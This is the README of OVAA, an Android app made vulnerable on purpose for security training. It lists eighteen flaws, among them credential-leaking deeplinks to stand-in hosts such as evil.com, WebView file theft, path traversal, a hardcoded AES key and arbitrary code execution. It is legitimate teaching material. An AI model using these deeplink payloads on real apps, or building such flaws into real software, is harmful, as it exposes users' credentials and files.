


OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.

List of vulnerabilities

This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.

  1. Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/. Leads to the user's user name and password being leaked when they log in.
  2. Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider.
  3. Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=....
  4. Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(true) in the WebViewActivity.java file to steal arbitrary files by sending them XHR requests and obtaining their content.
  5. Access to arbitrary activities and acquiring access to arbitrary content providers in LoginActivity by supplying an arbitrary Intent object to redirect_intent.
  6. Theft of arbitrary files in MainActivity by intercepting an activity launch from Intent.ACTION_PICK and passing the URI to any file as data.
  7. Insecure broadcast to MainActivity containing credentials. The attacker can register a broadcast receiver with action oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA and obtain the user's data.
  8. Insecure activity launch in MainActivity with action oversecured.ovaa.action.WEBVIEW, containing the user's encrypted data in the query parameter token.
  9. Deletion of arbitrary files via the insecure DeleteFilesSerializable deserialization object.
  10. Memory corruption via the MemoryCorruptionParcelable object.
  11. Memory corruption via the MemoryCorruptionSerializable object.
  12. Obtaining read/write access to arbitrary files in TheftOverwriteProvider via path-traversal in the value uri.getLastPathSegment().
  13. Obtaining access to app logs via InsecureLoggerService. Leak of credentials in LoginActivity Log.d("ovaa", "Processing " + loginData).
  14. Use of the hardcoded AES key in WeakCrypto.
  15. Arbitrary Code Execution in OversecuredApplication by launching code from third-party apps with no security checks.
  16. Use of very wide file sharing declaration for oversecured.ovaa.fileprovider content provider in root entry.
  17. Hardcoded credentials to a dev environment endpoint in strings.xml in test_url entry.
  18. Arbitrary code execution via a DEX library located in a world-readable/writable directory.

Licensed under the Simplified BSD License

Copyright (c) 2020, Oversecured Inc
